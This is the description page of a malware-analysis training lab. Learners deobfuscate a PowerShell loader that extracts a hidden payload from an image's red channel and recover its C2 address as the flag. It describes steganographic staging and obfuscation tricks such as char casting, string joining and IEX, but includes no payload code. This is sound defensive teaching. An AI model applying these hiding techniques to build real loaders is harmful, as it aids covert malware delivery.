Red Fish, Blue Fish
MediumMalware Reverse Engineering
Overview
You’ve intercepted two suspicious files: a partial PowerShell loader script and an image that seems to hide something unusual. The script hints at reading pixel data from the image, but key pieces are missing, leaving you to uncover what’s really being extracted. The image itself contains an odd pattern at its start—perhaps more than just colors. Your task is to piece together how the script operates, recover the hidden payload, and see what it’s trying to run.
Flag format:
flag{c2_ip_address:port}
Lab Details
Prerequisites & Requirements
- Steganography Fundamentals:
- Understanding how data can be hidden within the RGB Color Channels of an image.
- Familiarity with the
System.Drawing.Bitmapclass in .NET/PowerShell and how pixels are accessed programmatically.
- Python Scripting for Automation:
- Proficiency using the Pillow (PIL) library to manipulate images.
- Ability to iterate through pixel coordinates (x, y) and extract specific color values (Red, Green, Blue) to reconstruct a byte stream.
- PowerShell Obfuscation Techniques:
- Recognizing common malware obfuscation patterns, such as:
- Char Casting: [char](72+83-72)
- String Concatenation/Joining: [string]::join('', ...)
- Execution Aliases: IEX (Invoke-Expression).
- Recognizing common malware obfuscation patterns, such as:
What will you learn?
- Malware Staging Analysis:
- Analyzing a Multi-Stage Loader : Understanding how a benign-looking script (
loader.ps1) works in tandem with a resource file (cat.png) to construct the actual malicious payload in memory.
- Analyzing a Multi-Stage Loader : Understanding how a benign-looking script (
- Programmatic Payload Extraction:
- Reverse engineering the logic of a loop (for($y)... for($x)) to write a custom Python solver that mimics the malware's extraction process (dumping the Red channel until a null byte is found).
- Manual Deobfuscation:
- Decoding heavily obfuscated PowerShell scripts by isolating and evaluating small chunks of code.
- Translating character arrays and mathematical operations back into readable ASCII commands to reveal the Command & Control (C2) connection logic (
System.Net.Sockets.TCPClient).
Tools
- Python (with Pillow/PIL):
- Used to write the Solver Script . Since the PowerShell script was incomplete/obfuscated, Python is used to replicate the logic: opening the image, reading the pixel data, and converting the resulting array into a readable string.
- PowerShell / PowerShell ISE:
- Used for Deobfuscation . Instead of running the malicious IEX command, you use the shell to print the evaluated strings (
e.g., Write-Host or just evaluating the variable) to reveal the hidden C2 IP address and port.
- Used for Deobfuscation . Instead of running the malicious IEX command, you use the shell to print the evaluated strings (
- Text Editor (VS Code / Notepad++):
- Used to clean up the extracted payload and format the code for easier reading.
Job Positions
Malware Analyst
Tags
Static AnalysisMalware AnalysisSteganographyObfuscationDropperC2 CommunicationStringsCode Flow